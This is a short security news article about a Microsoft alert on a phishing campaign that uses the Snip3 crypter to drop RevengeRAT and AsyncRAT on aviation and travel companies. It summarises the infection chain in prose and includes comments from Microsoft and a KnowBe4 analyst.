Security news Threat Post, says that Microsoft has issued an alert. The warning is of a remote access trojan (RAT) that targets the aviation and travel industry. The new RevengeRAT malware campaign can harvest screenshots, keystrokes, webcam feeds, credentials, and browser data.
Microsoft published information on GitHub that security teams can use if they detect these threats on their network. And the latest Microsoft Security Intelligence details how phishing emails are used to upload RevengeRAT.
Morphisec the software security company dubbed the crypter service “Snip3.” The name comes from a username taken from the malware found across earlier variants.
This is a highly sophisticated Crypter-as-a-Service. And it delivers numerous RAT families onto a variety of target machines.
The malware or “payload” is most commonly delivered by disguising phishing emails. If the target clicks on an image on the email, Snip3 delivers its payload via some form of a malicious VBScript. Snip3 in turn conveys strains of the RAT payloads (RevengeRAT or AsyncRAT).
Using phishing emails to deliver RevengeRAT
Phishing emails usually contain a link to an image disguised as a PDF file. The emails usually evade security filters since the embedded link is generated with a legitimate web service.
“The campaign uses emails that spoof legitimate organizations, with lures relevant to aviation, travel, or cargo. An image posing as a PDF file contains an embedded link (typically abusing legitimate web services) that downloads a malicious VBScript, which drops the RAT payloads,” Microsoft said.
— Threatpost (@threatpost) May 13, 2021
Once the RATs are active, they directly connect to a command and control (C2) server. And then proceed to download more malware from paste sites like pastebin.com.
“The RATs connect to a C2 server hosted on a dynamic hosting site to register with the attackers, and then uses a UTF-8-encoded PowerShell and fileless techniques to download three additional stages from pastebin[.]com or similar sites,” reports Microsoft Security Intelligence.
Roger Grimes, tech evangelist at KnowBe4, comments on the RevengeRAT campaign. Grimes says that this type of campaign shows a new development in malware gang activity. And by specializing in attacking specific vertical sectors besides the usual, financial and government RevengeRat differs. They use precise lures in phishing emails. And the campaigns are tailored to a more directed attack.
“The targeting of particular industries is now often pointing to particular malware gangs,” he explained to Threatpost. “Many gangs have become more specialized, targeting a specific industry that they have especially good experience and success in. To increase the chances of getting a potential victim to execute malware, the attacker has to make the social-engineering and phishing attack seem as close to an internal or partner communication, as possible. Specializing in a particular industry helps to do this.”